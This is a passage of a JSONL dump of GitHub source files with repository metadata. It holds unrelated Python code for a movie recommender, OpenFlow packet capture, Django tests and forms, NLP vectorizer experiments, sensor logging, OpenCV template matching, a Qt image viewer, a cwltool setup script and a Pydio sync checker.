= meanRatingOfActiveUser + numerator / denumerator\n\t\t\tpredictedMovies[predictionCounter] = ((str(movieID), str(userID), predictedRating))\n\t\t\tpredictionCounter += 1\n\t\t\tmaeValue += abs(predictedRating - expectedRating) # absolute value of the difference\n\t\t\t# append the values to the arrays for the RMSE calculation\n\t\t\trmsePredictions.append(predictedRating)\n\t\t\trmseExpecteds.append(expectedRating)\n\n\t\t\t# movie recommendation\n\t\t\tif predictedRating > 
4:\n\t\t\t\trecommendations[recommendationCounter] = (str(movieID), str(userID))\n\t\t\t\trecommendationCounter += 1\n\n\n\tnp.savetxt('PredictRatings.txt', predictedMovies,delimiter=',',newline='\\n', fmt='%s,%s,%f')\n\tnp.savetxt('RecommendMovie.txt', recommendations, delimiter=',',newline='\\n', fmt='%s,%s')\n\tprint(\"MAE : \" + str(maeValue/predictionCounter))\n\tprint(\"RMSE : \" + str(rmse(np.asarray(rmsePredictions),np.asarray(rmseExpecteds))))\n\treturn\n\n############################################ END OF FUNCTIONS DEFINITIONS ########################################\n\n# store the ratings given to each movie by the users\nbuildMovieUserRatingMatrix(trainData)\nprint(\"Movie-user matrix build time is %s\" % (time.time() - startTime))\n\n# build the weight matrix between users\n# compiled to C with the aim of speeding the program up\nweightMatrix = buildUserWeightMatrix.buildWeightMatrixBetweenUsers(movieUserRatingMatrix,numberOfUsers)\n#print(weightMatrix[0:10, 0:10])\nprint(\"Execution time: %s seconds.\" % (time.time() - startTime))\n\n\n# read testRatings\ntestData = pandas.read_csv('TestingRatings.txt', names=columnNames, dtype={'movieID': str, 'userID': str, 'rating': float})\n#print(len(testData))\npredictAndCompareUserRating(testData,weightMatrix,knn)\n# program execution time takes about 55 hours","repo_name":"fukit0/NetflixRecommenderSystem","sub_path":"RecommenderSystem.py","file_name":"RecommenderSystem.py","file_ext":"py","file_size_in_byte":5650,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"5514227702","text":"\"\"\"\nCapture App\n\"\"\"\n\nimport pickle\n\nfrom pyof.foundation.basic_types import DPID\nfrom pyof.v0x04.common.header import Type\nfrom pyof.v0x04.controller2switch.common import MultipartType\n\nfrom proxy.observer import OFObserver\nfrom capture.of_msg_repository import packet_in_out_repo\nfrom ofproto.packet import OFMsg\nfrom ofproto.datapath import Port, Datapath\nfrom ofproto.packet import todict\n\nimport web.proto.api_pb2 as pb\nfrom web.ws_server import emit_ofmsg, set_getOpenFlowMessage_handler\n\n\nclass CaptureBase(OFObserver):\n \"\"\"CaptureBase\n\n This is a base class for saving messages to a repository or output to stdout.\n \"\"\"\n\n def __init__(self, observable, do_capture=True):\n super(CaptureBase, self).__init__(observable)\n # local port to datapath id mapping\n self.lport_to_dpid = {}\n # local port to port obj mapping\n self.lport_to_port = {}\n\n # all captured messages\n self._messages = []\n self.do_capture = do_capture\n\n # datapaths\n self._datapathes: list[Datapath] = []\n \n # handlers\n self.handlers = {}\n\n def update(self, msg):\n \"\"\"handle msg\n\n * this method is called by the observable\n\n Args:\n msg (OFMsg) : openflow message object\n \"\"\"\n # datapaths\n datapath = self._get_datapath(msg.local_port)\n if datapath is None:\n datapath = Datapath()\n datapath.local_port = msg.local_port\n self._datapathes.append(datapath)\n\n # set datapathid\n if msg.message_type == Type.OFPT_FEATURES_REPLY:\n # set datapath id\n if isinstance(msg.of_msg.datapath_id, DPID):\n datapath_id = int(''.join(msg.of_msg.datapath_id.value.split(':')), 16)\n self.lport_to_dpid[msg.local_port] = datapath_id\n datapath.datapath_id = datapath_id\n \n # set port obj\n elif msg.message_type == Type.OFPT_MULTIPART_REPLY:\n if msg.of_msg.multipart_type == MultipartType.OFPMP_PORT_DESC:\n # Note: OFPMP_PORT_DESC message body is a list of ports\n 
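# wrap each raw pyof port description in our Port helper before caching it\n 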
port_list = []\n for p in msg.of_msg.body:\n port_list.append(Port.from_dict(todict(p)))\n self.lport_to_port[msg.local_port] = port_list\n datapath.ports = port_list\n\n # update msg datapath id (before FeaturesReply)\n if msg.local_port in self.lport_to_dpid.keys():\n msg.datapath_id = self.lport_to_dpid[msg.local_port]\n\n if self.do_capture:\n self._messages.append(msg)\n\n # notify subclass\n self.msg_handler(msg)\n\n def msg_handler(self, msg):\n if msg.message_type in self.handlers.keys():\n self.handlers[msg.message_type](msg)\n if \"*\" in self.handlers.keys():\n self.handlers[\"*\"](msg)\n\n def get_datapathid(self, local_port):\n \"\"\"get datapath id\n\n Args:\n local_port (int) : local port\n\n Returns:\n int or None : datapath id\n \"\"\"\n if local_port in self.lport_to_dpid.keys():\n return self.lport_to_dpid[local_port]\n else:\n return None\n\n def _get_datapath(self, local_port: int):\n datapath = None\n for d in self._datapathes:\n if d.local_port == local_port:\n datapath = d\n break\n return datapath\n\n def get_port(self, datapath_id):\n \"\"\"get local port of datapath\n\n Args:\n datapath_id (int or string) : Datapath ID that can be converted to int.\n\n Returns:\n int or None : local port\n \"\"\"\n if not isinstance(datapath_id, int):\n datapath_id = int(datapath_id)\n for p, d in self.lport_to_dpid.items():\n if d == datapath_id:\n return p\n return None\n\n def get_port_name(self, local_port, port_no):\n \"\"\"get port name from port number\n \"\"\"\n for port in self.lport_to_port[local_port]:\n if int(port_no) == port_no:\n return port.name\n return None\n\n def __str__(self):\n msgs = \"\"\n for msg in self._messages:\n datapathid = self.get_datapathid(msg.local_port)\n order = \"switch(dpid={}) -> controller\".format(datapathid)\n if not msg.switch2controller:\n order = \"controller -> switch(dpid={})\".format(datapathid)\n msg_name = \"{}(xid={})\".format(msg.msg_name, msg.xid)\n\n msgs += \"{} {} {} \\n\".format(msg.datetime, order, msg_name)\n return msgs\n\n\nclass SimpleCapture(CaptureBase):\n\n def __init__(self, observable):\n super(SimpleCapture, self).__init__(observable)\n\n\nclass CaptureWithRepo(CaptureBase):\n \"\"\"\n\n Todo:\n * to get ofport from phy_port\n \"\"\"\n\n def __init__(self, observable):\n super(CaptureWithRepo, self).__init__(observable)\n self.repo = packet_in_out_repo\n\n def msg_handler(self, msg):\n super(CaptureWithRepo, self).msg_handler(msg)\n self.add_repo(msg)\n\n def add_repo(self, msg):\n if msg.message_type == Type.OFPT_PACKET_OUT:\n self.logger.debug(\"add repo {}\".format(msg))\n self.repo.add(msg)\n elif msg.message_type == Type.OFPT_PACKET_IN:\n self.logger.debug(\"add repo {}\".format(msg))\n self.repo.add(msg)\n\n def get_packet_in_out_repo(self):\n return self.repo\n\n\nclass CaptureWithPipe(CaptureBase):\n \"\"\"\n\n Todo:\n * to get ofport from phy_port\n \"\"\"\n\n def __init__(self, observable, parent_conn=None):\n super(CaptureWithPipe, self).__init__(observable)\n self.parent_conn = parent_conn\n self._send_types = [Type.OFPT_PACKET_OUT, Type.OFPT_PACKET_IN, Type.OFPT_FLOW_MOD]\n\n def msg_handler(self, msg):\n super(CaptureWithPipe, self).msg_handler(msg)\n self.send_pipe(msg)\n\n def send_pipe(self, msg):\n if self.parent_conn:\n if msg.message_type in self._send_types:\n # pre-pickle to avoid error\n msg.of_msg = msg.of_msg.pack()\n msg = pickle.dumps(msg)\n self.parent_conn.send_bytes(msg)\n\n def get_packet_in_out_repo(self):\n return packet_in_out_repo\n\n\nclass CaptureWithWeb(CaptureBase):\n 
\"\"\"\n Capture With Web\n \"\"\"\n\n def __init__(self, observable):\n super(CaptureWithWeb, self).__init__(observable, do_capture=True)\n # protobuf messages\n self.messages = []\n\n set_getOpenFlowMessage_handler(self._get_ofmsgs)\n\n def msg_handler(self, msg):\n super(CaptureWithWeb, self).msg_handler(msg)\n proto_datapath = pb.Datapath()\n proto_datapath.local_port = str(msg.local_port)\n dpid = self.get_datapathid(msg.local_port)\n if dpid:\n proto_datapath.id = str(dpid)\n else:\n proto_datapath.id = \"\"\n proto_OFMsg = pb.OpenFlowMessage()\n proto_OFMsg.datapath.local_port = proto_datapath.local_port\n proto_OFMsg.datapath.id = proto_datapath.id\n proto_OFMsg.xid = int(msg.of_msg.header.xid)\n proto_OFMsg.message_type = msg.msg_name\n proto_OFMsg.timestamp = msg.timestamp\n proto_OFMsg.switch2controller = msg.switch2controller\n proto_OFMsg.content = str(todict(msg.of_msg))\n self.messages.append(proto_OFMsg)\n emit_ofmsg(proto_OFMsg.SerializeToString())\n\n def _get_ofmsgs(self, _request):\n ofmsgs = pb.OpenFlowMessages()\n for m in self.messages:\n ofmsgs.messages.append(m)\n self.messages = []\n return ofmsgs.SerializeToString()\n\n","repo_name":"shu1r0/ofcapture","sub_path":"capture/capture.py","file_name":"capture.py","file_ext":"py","file_size_in_byte":7695,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"7623077373","text":"def check(n):\n s=n//k\n if s*k==n:\n return True\n return False\nl,r,k =map(int,input().split())\nc=0\nfor i in range(l,r+1):\n if(check(i)):\n c+=1\nprint(c)\n","repo_name":"Happy-76/codemind-python","sub_path":"Count_Divisors.py","file_name":"Count_Divisors.py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"35198183913","text":"\ndef copiar_sin_repetidos(self):\n #Genero una instancia de la lista\n copia = LinkedList()\n #Verifico si la lista es vacia caso contrario retorno una lista vacia\n if self.__first != None:\n lista = [self.__first.value]\n #Inicializo la lista a retornar con el primer valor\n copia._first = LinkedList.Node(self._first.value)\n p = self.__first.next_node\n q = copia.__first\n copia.__len += 1\n #mientras no finalice la lista original\n while p != None:\n #Reviso si ya existe en la lista original-caso verdadero avanzo al siguiente nodo\n if p.value in lista:\n p = p.next_node\n else:\n #No se encuentra en la lista repetido y lo copio y aumento el tamañod e la lista\n q.next_node = LinkedList.Node(p.value)\n q = q.next_node\n copia.__len += 1\n lista.append(p.value)\n copia.__last = q\n return copia","repo_name":"pablolupo84/ListasEnlzadas","sub_path":"Ejemplos/Test_2/clases.py","file_name":"clases.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40919539527","text":"from datetime import date\n\nfrom django.test import TestCase\nfrom blog.models import Post, Tag\nfrom . 
import predefined_dataclasses as pred_dc\n\nclass PostTestCase(TestCase):\n fixtures = [\"post_fixtures.json\"]\n\n def setUp(self):\n self.test_post_1 = pred_dc.PostDataClass(\n title = \"Test Post Title\",\n subtitle = \"Test Post Subtitle\",\n body = \"#Header 1\",\n created_at = date(2021, 1, 1),\n updated_at = date(2021, 1, 1)\n )\n\n self.test_post_2 = pred_dc.PostDataClass(\n title = \"Test Post Title 2\",\n subtitle = \"Test Post Subtitle 2\",\n body = \"#Header 1\",\n created_at = date(2021, 1, 2),\n updated_at = date(2021, 1, 3)\n )\n\n def test_post_1_has_appropriate_properties(self):\n test_post = Post.objects.get(\n title = self.test_post_1.title,\n subtitle = self.test_post_1.subtitle,\n body = self.test_post_1.body,\n )\n\n self.assertIsNotNone(test_post.uuid)\n self.assertEqual(test_post.title, self.test_post_1.title)\n self.assertEqual(test_post.subtitle, self.test_post_1.subtitle)\n self.assertEqual(test_post.body, self.test_post_1.body)\n self.assertEqual(test_post.created_at,\n self.test_post_1.created_at)\n self.assertEqual(test_post.updated_at,\n self.test_post_1.updated_at)\n\n def test_post_2_has_appropriate_properties(self):\n test_post = Post.objects.get(\n title = self.test_post_2.title,\n subtitle = self.test_post_2.subtitle,\n body = self.test_post_2.body,\n )\n\n self.assertIsNotNone(test_post.uuid)\n self.assertEqual(test_post.title, self.test_post_2.title)\n self.assertEqual(test_post.subtitle, self.test_post_2.subtitle)\n self.assertEqual(test_post.body, self.test_post_2.body)\n self.assertEqual(test_post.created_at,\n self.test_post_2.created_at)\n self.assertEqual(test_post.updated_at,\n self.test_post_2.updated_at)\n\n\nclass TagTestCase(TestCase):\n def setUp(self):\n self.test_tag_1 = pred_dc.TagDataClass(\n name='test_tag'\n )\n\n Tag.objects.create(\n name = self.test_tag_1.name\n )\n\n def test_tag_has_appropriate_properties(self):\n test_tag = Tag.objects.get(\n name = self.test_tag_1.name\n )\n\n self.assertEqual(test_tag.name, self.test_tag_1.name)\n self.assertIsNotNone(test_tag.uuid)\n\n","repo_name":"lambrosopos/blog","sub_path":"blog/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31292793491","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author = 'wyx'\n@time = 2018/6/27 17:28\n@annotation = ''\n\"\"\"\nimport os\n\nfrom gensim.models import Word2Vec\nfrom gensim.models.word2vec import LineSentence\nfrom keras import Sequential\nfrom keras.layers import Dense, Dropout\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\n\ncorpus = [\n 'This is the first document.',\n 'This is the second second document.',\n 'And the third one.',\n 'Is this the first document?',\n]\n\nif False:\n vectorizer = CountVectorizer()\n y = vectorizer.fit_transform(corpus)\n # word-to-index mapping\n print(vectorizer.vocabulary_)\n print()\n feature_name = vectorizer.get_feature_names()\n print(y)\n print(feature_name)\n\n print(len(feature_name))\n print(y.toarray())\n print(y.shape)\nif False:\n q = \"\"\"\n Tfidf\n \"\"\"\n print(q)\n\n tfidf = TfidfVectorizer()\n y = tfidf.fit_transform(corpus)\n # word-to-index mapping (use the tfidf object here, not the CountVectorizer from the previous block)\n print(tfidf.vocabulary_)\n print()\n feature_name = tfidf.get_feature_names()\n print(y)\n print(feature_name)\n\n print(len(feature_name))\n print(y.toarray())\n print(y.shape)\n\nif False:\n q = \"\"\"\n Word2Vec (tokenize first)\n \"\"\"\n print(q)\n\n word = [['first', 'sentence'], 
['second', 'sentence']]\n model = Word2Vec(word, min_count=1)\n print(model)\n vac = model.vocabulary\n print(vac)\n print(model.corpus_count)\n print(model['first'])\n print(model.most_similar('sentence'))\n\n\n # model = Doc2Vec(corpus,size=50, min_count=2, iter=10)\n # print(model['This'])\n\n def train_word2vec(filename, word2vec_file):\n # only train if the model file does not exist yet\n if not os.path.exists(word2vec_file):\n sentences = LineSentence(filename)\n # sg=0 trains with CBOW; sg=1 (skip-gram) is more sensitive to low-frequency words\n model = Word2Vec(sentences,\n size=300, window=5, min_count=2, sg=1, workers=4)\n model.save(word2vec_file)\n\n\n word2vec_file = 'temp/w2v.bin'\n train_word2vec('temp/news_sohusite_cutword.txt', word2vec_file)\n model = Word2Vec.load(word2vec_file)\n print(model.most_similar('健康'))\n print(model.similarity('健康', '血压'))\n print(model.similarity('血压', '健康'))\n print(model.similarity('血压', '血压'))\n print(model.similarity('血压', '牛奶'))\n\n\ndef baseline_model(max_features):\n model = Sequential()\n model.add(Dense(5, input_dim=max_features, activation='relu'))\n model.add(Dropout(0.2))\n model.add(Dense(2, activation='softmax'))\n # Compile model\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n return model # the original never returned the compiled model\n","repo_name":"631068264/learn-sktf","sub_path":"tf_cook/nlp/sk_bag_word.py","file_name":"sk_bag_word.py","file_ext":"py","file_size_in_byte":2659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25723226499","text":"\"\"\"Run time application\"\"\"\n\nfrom common import STORED_PROC_KEY, TEMP_STORED_PROC, SENSOR_ERROR_KEY, SENSOR_LOCATION_KEY, SENSOR_TEMP_KEY, DB_ARGS_KEY\nfrom common.db import DB\nfrom common.exceptions import SetTempError\nfrom common.sensors import Sensors\nfrom common.enums import RequestTypes\n\n\ndef main():\n \"\"\"The main application\"\"\"\n sensor_data = Sensors().temps\n db_conn = DB()\n fails = []\n for data in sensor_data:\n args = {STORED_PROC_KEY: TEMP_STORED_PROC} | {DB_ARGS_KEY: [data[SENSOR_TEMP_KEY], data[SENSOR_ERROR_KEY], data[SENSOR_LOCATION_KEY]]}\n error, resp = db_conn.request(method=RequestTypes.POST, uri=f\"{db_conn.db_host}/{db_conn.call}\", args=args)\n if error:\n fails.append(resp)\n\n if fails:\n raise SetTempError(f\"The following errored when saving to the DB: {fails}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"another-salad/house_temp","sub_path":"scheduler/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3641387720","text":"import cv2 as cv\r\nimport numpy as np\r\n\r\nlamp_img = cv.imread(r'C:\\Users\\User\\Desktop\\Project\\Phyton\\images\\lamp.png', cv.IMREAD_UNCHANGED)\r\nled_img = cv.imread(r'C:\\Users\\User\\Desktop\\Project\\Phyton\\images\\led.png', cv.IMREAD_UNCHANGED)\r\n\r\nresult = cv.matchTemplate(lamp_img, led_img, cv.TM_CCOEFF_NORMED)\r\n\r\n\r\nmin_val, max_val, min_loc, max_loc = cv.minMaxLoc(result)\r\n\r\nprint('Best match top left location: %s' %str(max_loc))\r\nprint('Best match confidence: %s' % max_val)\r\n\r\nthreshold = 0.8\r\nif max_val >= threshold:\r\n print('Found needle.')\r\n\r\n led_w = led_img.shape[1]\r\n led_h = led_img.shape[0]\r\n\r\n top_left = max_loc\r\n bottom_right = (top_left[0] + led_w, top_left[1] + led_h)\r\n\r\n cv.rectangle(lamp_img, top_left, bottom_right, color=(0,0,255), thickness=2, lineType=cv.LINE_4)\r\n\r\n cv.imshow('Result', lamp_img)\r\n cv.waitKey()\r\nelse:\r\n print('Needle not 
found.')\r\n\r\n\r\n\r\n# cv.imshow('Result', result)\r\n# cv.waitKey()","repo_name":"nikfakhri06/imageDetectionLED","sub_path":"LED Test/ledTest.py","file_name":"ledTest.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30981006419","text":"from shop.models import Product\nfrom django import forms\nfrom shop.models import STATUS_CHOICES, ORDER_BY_CHOICES\n\n\nclass FormStatus(forms.Form):\n\n status = forms.ChoiceField(\n choices=STATUS_CHOICES,\n widget=forms.Select(attrs={\"class\": \"ml-1 mr-3\"}),\n required=False,\n )\n\n cost__gt = forms.IntegerField(\n min_value=0,\n label=\"Price Min\",\n widget=forms.TextInput(attrs={\"class\": \"ml-1 mr-3\"}),\n required=False,\n )\n\n cost__lt = forms.IntegerField(\n min_value=0,\n label=\"Price Max\",\n widget=forms.TextInput(attrs={\"class\": \"ml-1 mr-3\"}),\n required=False,\n )\n\n order_by = forms.ChoiceField(\n choices=ORDER_BY_CHOICES,\n widget=forms.Select(attrs={\"class\": \"ml-1 mr-3\"}),\n required=False,\n )\n\n\nclass FilterDate(forms.Form):\n filter_by_date = forms.ChoiceField(\n choices=((\"NEW_FIRST\", \"new first\"), (\"OLD_AT_FIRST\", \"old at first\")),\n widget=forms.Select(attrs={\"class\": \"ml-1 mr-3\"}),\n required=False,\n )\n","repo_name":"apterek/dj","sub_path":"django/blog/shop/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74660882168","text":"\"\"\"Adds balance offset to transfer_account\n\nRevision ID: 103e570ddb24\nRevises: 49e8a333d285\nCreate Date: 2020-07-03 14:57:35.942456\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '103e570ddb24'\ndown_revision = '49e8a333d285'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('transfer_account', sa.Column('_balance_offset_wei', sa.Numeric(precision=27), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_column('transfer_account', '_balance_offset_wei')\n # ### end Alembic commands ###\n","repo_name":"teamsempo/SempoBlockchain","sub_path":"app/migrations/versions/103e570ddb24_.py","file_name":"103e570ddb24_.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"77"} +{"seq_id":"4223651674","text":"# -*- coding: utf-8 -*-\nimport PySide\n\nfrom pyqtgraph.Qt import QtGui, QtCore\nimport numpy as np\nimport pyqtgraph as pg\nimport sys\nimport time\n\n# from Queue import Queue\nfrom multiprocessing import Queue\nfrom threading import Thread\n\nfrom pyqtgraph.widgets.RawImageWidget import RawImageWidget\nimport time\n\n\nclass QtPlotter(object):\n def __init__(self, app):\n super(QtPlotter, self).__init__()\n self.app = app\n self.create_QtPlotter()\n self.data = None\n\n def create_QtPlotter(self):\n self.RAW = 1\n if self.RAW:\n self.win = QtGui.QMainWindow()\n self.win.resize(400, 400)\n self.rawImg = RawImageWidget(self.win, scaled=True)\n self.win.setCentralWidget(self.rawImg)\n self.win.show()\n else:\n self.win = pg.GraphicsLayoutWidget()\n self.win.show()\n self.win.setWindowTitle(\"TART2 - Live View\")\n view = self.win.addViewBox()\n view.setAspectLocked(True)\n self.img = pg.ImageItem(border=\"w\")\n view.addItem(self.img)\n self.timer = QtCore.QTimer()\n self.timer.timeout.connect(self.update)\n self.timer.start(0)\n self.q = Queue()\n\n def getPort(self):\n return self.q\n\n def update(self):\n # qsize = self.q.qsize()\n # print 'PlotQ size',qsize\n # if qsize > 2:\n # [self.q.get() for _ in range(qsize-1)]\n # print '!!!!!!!!!!!!!!!!!!!!!! dropping frames when displaying !!!!!!!!!!!!!!!!!!!!!!!!!!!!'\n a = time.time()\n if not self.q.empty():\n # while not self.q.empty():\n # print self.q.qsize()\n # if self.data is None:\n self.data = self.q.get()\n # else:\n # self.data[:] = self.q.get()\n # print 'drop drop drop.'\n # print data[0]\n b = time.time()\n print(b - a, \"getting data off queue\")\n if self.RAW:\n d_max = self.data.max()\n self.data /= d_max\n self.data *= 255\n self.rawImg.setImage(self.data)\n else:\n self.data -= self.data.min()\n self.data /= self.data.max()\n self.data *= 255\n # self.img.setImage(data,autoRange=True,autoLevels=True)\n self.img.setImage(self.data)\n self.app.processEvents()\n c = time.time()\n print(c - b, \"update done.\")\n\n # except Queue.Empty:\n # pass\n\n\ndef qtLoop():\n import sys\n\n if (sys.flags.interactive != 1) or not hasattr(QtCore, \"PYQT_VERSION\"):\n QtGui.QApplication.instance().exec_()\n\n\n## Start Qt event loop unless running in interactive mode or using pyside.\nif __name__ == \"__main__\":\n app = QtGui.QApplication([])\n plotter = QtPlotter(app)\n q_handle = plotter.getPort()\n\n def producer():\n while True:\n q_handle.put(np.random.normal(size=(2 ** 8, 2 ** 8)).astype(np.float16))\n time.sleep(0.05)\n\n p = Thread(target=producer)\n p.daemon = True\n p.start()\n qtLoop()\n","repo_name":"tmolteno/TART","sub_path":"hardware/rpi/tart_cli/qt_view.py","file_name":"qt_view.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"77"} +{"seq_id":"78138404","text":"#!/usr/bin/env python\nimport os\nimport sys\n\nimport setuptools.command.egg_info as egg_info_cmd\nfrom setuptools import setup\n\nSETUP_DIR = os.path.dirname(__file__)\nREADME = os.path.join(SETUP_DIR, 'README.rst')\n\n# if python3 runtime and `setup.py install` is called\nif 
sys.version_info.major == 3 and len(sys.argv) > 1 and sys.argv[1] == 'install': # guard len(sys.argv) so bare 'python setup.py' does not raise IndexError\n print(\"Aborting installation. CWL Tool doesn't support Python 3 currently.\")\n print(\"Install using Python 2 pip.\")\n exit(1)\n\ntry:\n import gittaggers\n\n tagger = gittaggers.EggInfoFromGit\nexcept ImportError:\n tagger = egg_info_cmd.egg_info\n\nneeds_pytest = {'pytest', 'test', 'ptr'}.intersection(sys.argv)\npytest_runner = ['pytest-runner'] if needs_pytest else []\n\nsetup(name='cwltool',\n version='1.0',\n description='Common workflow language reference implementation',\n long_description=open(README).read(),\n author='Common workflow language working group',\n author_email='common-workflow-language@googlegroups.com',\n url=\"https://github.com/common-workflow-language/cwltool\",\n download_url=\"https://github.com/common-workflow-language/cwltool\",\n license='Apache 2.0',\n packages=[\"cwltool\", 'cwltool.tests'],\n package_dir={'cwltool.tests': 'tests'},\n package_data={'cwltool': ['schemas/draft-2/*.yml',\n 'schemas/draft-3/*.yml',\n 'schemas/draft-3/*.md',\n 'schemas/draft-3/salad/schema_salad/metaschema/*.yml',\n 'schemas/draft-3/salad/schema_salad/metaschema/*.md',\n 'schemas/v1.0/*.yml',\n 'schemas/v1.0/*.md',\n 'schemas/v1.0/salad/schema_salad/metaschema/*.yml',\n 'schemas/v1.0/salad/schema_salad/metaschema/*.md',\n 'schemas/v1.1.0-dev1/*.yml',\n 'schemas/v1.1.0-dev1/*.md',\n 'schemas/v1.1.0-dev1/salad/schema_salad/metaschema/*.yml',\n 'schemas/v1.1.0-dev1/salad/schema_salad/metaschema/*.md',\n 'cwlNodeEngine.js',\n 'extensions.yml']},\n include_package_data=True,\n install_requires=[\n 'setuptools',\n 'requests >= 1.0',\n 'ruamel.yaml >= 0.12.4',\n 'rdflib >= 4.2.2, < 4.3.0',\n 'shellescape >= 3.4.1, < 3.5',\n 'schema-salad >= 2.4.20170308171942, < 3',\n 'typing >= 3.5.2, < 3.6',\n 'six >= 1.8.0',\n ],\n setup_requires=[] + pytest_runner,\n test_suite='tests',\n tests_require=['pytest', 'mock >= 2.0.0',],\n entry_points={\n 'console_scripts': [\"cwltool=cwltool.main:main\"]\n },\n zip_safe=True,\n cmdclass={'egg_info': tagger},\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Operating System :: POSIX',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 2 :: Only',\n ]\n )\n","repo_name":"inutano/cwltool","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"29328343099","text":"# Credit approval\ningreso = int(input(\"ingrese sus ingresos en pesos: \"))\nnacimiento = int(input(\"ingrese su año de naciemiento: \"))\nhijos = int(input(\"ingrese su numero de hijos: \"))\npertenencia = int(input(\"ingrese sus años de pertenencia en el banco: \"))\nEcivil = str(input(\"ingrese su estado civil soltero,\"\"S\"\" o casado,\"\"C\"\": \"))\nvive = str(input(\"ingrese si vive en campo,\"\"R\"\" o en ciudad,\"\"U\"\": \"))\n\n# compare the answer directly with the \"S\"/\"C\" strings (the original 'C = casado' / 'S = soltero' lines referenced undefined names)\n\nif pertenencia > 10 and hijos >= 2:\n print(\"APROBADO\")\nelif Ecivil == \"C\" and hijos >= 3 and 45 <= nacimiento <= 55:\n print(\"APROBADO\")","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej3/hito1_ej3_672ffa2eb0b95aa209b1d3973f0e261a.py","file_name":"hito1_ej3_672ffa2eb0b95aa209b1d3973f0e261a.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"655762212","text":"import tensorflow as tf\nimport numpy as np\n\ninputs = np.asarray([np.random.randint(0, 5, (6, 3)) for i in 
range(4)])\nlens = np.random.randint(1, 6, 4)\n# print(inputs)\nprint(lens)\n\ninput_x = tf.placeholder(dtype=tf.float32, shape=[None, 6, 3])\ninput_l = tf.placeholder(dtype=tf.int32, shape=[None])\ninput_xp = input_x ** 2\n\nre_x = tf.reverse_sequence(input_xp, seq_lengths=tf.cast(input_l, dtype=tf.int64), seq_dim=1)\n\nshape_ = tf.shape(input_xp)\n\nwith tf.Session() as sess:\n d_input_xp = sess.run(input_xp, feed_dict={input_x: inputs, input_l: lens})\n print('input:\\n', d_input_xp)\n d_shape_ = sess.run(shape_, feed_dict={input_x: inputs})\n print(d_shape_)\n d_re_x = sess.run(re_x, feed_dict={input_x: inputs, input_l: lens})\n print('re_input:\\n', d_re_x)","repo_name":"easonnie/master-tensor","sub_path":"try_tensorflow/testscript/test-reverse.py","file_name":"test-reverse.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"32649139913","text":"import fnmatch\nfrom watchdog.utils.dirsnapshot import DirectorySnapshot as dirsnap\nfrom requests.exceptions import ReadTimeout\nimport logging\nimport platform\nimport unicodedata\nimport os\nimport time\n\nclass SyncChecker():\n \"\"\" An object to check sync, based on listing local and remote files\n \"\"\"\n def __init__(self, job_id, jobs, sdk):\n \"\"\"\n :param jobid: the job_id to check\n :param conf: the information from job_configs.json\n :param sdk: a remote sdk\n \"\"\"\n self.jobid = job_id\n self.conf = jobs\n self.sdk = sdk\n\n def toset(self, prefix, pathset):\n \"\"\" transform an absolute path set to a relative path set \"\"\"\n rel_path = set()\n for p in pathset:\n rel_path.add(p.replace(prefix, ''))\n return rel_path\n\n\n def recursive_list(self, path):\n ls = dict()\n folder_queue = [path]\n\n while len(folder_queue):\n ignore = False\n folder = folder_queue.pop(0)\n for excluded in self.sdk.remote_excluded_files:\n if folder.startswith(excluded):\n ignore = True\n break\n\n if ignore:\n continue\n\n result = self.sdk.list(dir=folder, recursive='false', max_depth=1)\n del result[folder]\n keys = list(result.keys())\n if len(keys) == 0:\n continue\n\n blk_stats = self.sdk.bulk_stat(list(result.keys()), with_hash=True)\n for p in blk_stats:\n stats = blk_stats[p]\n ls[p] = stats\n if stats.has_key('hash') and stats['hash'] == 'directory' and p != folder:\n folder_queue.append(p)\n return ls\n\n\n def docheck(self, path, subfolder=\"\"):\n \"\"\" Using PydioSdk connects to a server and compares the list of files at\n :param path: with the list of files at the :param sdk:\n \"\"\"\n remote_ls = self.recursive_list(path=\"/\")\n\n if subfolder != 